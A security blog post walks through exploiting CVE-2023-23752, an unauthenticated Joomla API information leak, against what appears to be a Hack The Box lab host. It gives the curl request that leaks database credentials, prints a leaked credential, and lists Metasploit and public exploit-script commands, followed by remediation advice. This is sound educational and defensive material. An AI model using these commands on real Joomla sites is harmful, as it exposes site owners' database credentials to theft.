(CVE-2023-23752)[Exploitation] Joomla! CMS security bypass, Unauthenticated Information Disclosure

by Vry4n_ | Jan 13, 2024 | CMS | 0 comments

Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability. This vulnerability allows unauthenticated users access to webservice endpoints which contain sensitive information. Specifically, for this module we exploit the users and config/application endpoints. This module was tested against Joomla 4.2.7 running on Docker.

As discussed, CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system’s configuration, which contains the Joomla! MySQL database credentials in plaintext. The following demonstrates the leak:

curl -v http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

In the proof of concept above, the server responds with the credentials lewis:P4ntherg0t1n5r3c0n##, which are the credentials for our test Joomla! MySQL account.

Affected Products

Joomla! 4.0.0

Joomla! 4.2.7

4.0.0 – 4.2.7

Identification

1. Scan Joomla using JoomScan script (https://github.com/OWASP/joomscan)

joomscan –url http://dev.devvortex.htb

Note: Knowing the version is between 4.0.0 – 4.2.7, we can assume this host is vulnerable.

Exploitation #1 (Metasploit)

1. We can use joomla_api_improper_access_checks to exploit this vulnerability

use auxiliary/scanner/http/joomla_api_improper_access_checks
show options

2. Now set the target host and port if required

set RHOSTS dev.devvortex.htb
run

Exploitation #2 (Script)

1. We can try another script (https://github.com/Acceis/exploit-CVE-2023-23752)

git clone https://github.com/Acceis/exploit-CVE-2023-23752.git
cd exploit-CVE-2023-23752
ls

2. Install dependencies (OPTIONAL)

gem install httpx docopt paint

3. Run the script help menu

ruby exploit.rb -h

4. Run the script

ruby exploit.rb http://dev.devvortex.htb

Remediation

Upgrade to the latest version of Joomla! CMS (4.2.8 or later), available from the Joomla! Web site.

Sources

https://vulncheck.com/blog/joomla-for-rce

https://exchange.xforce.ibmcloud.com/vulnerabilities/247706

https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html

https://packetstormsecurity.com/files/171474

https://www.mend.io/vulnerability-database/CVE-2023-23752

https://www.rapid7.com/db/modules/auxiliary/scanner/http/joomla_api_improper_access_checks/

468

Submit a Comment Cancel reply

You must be logged in to post a comment.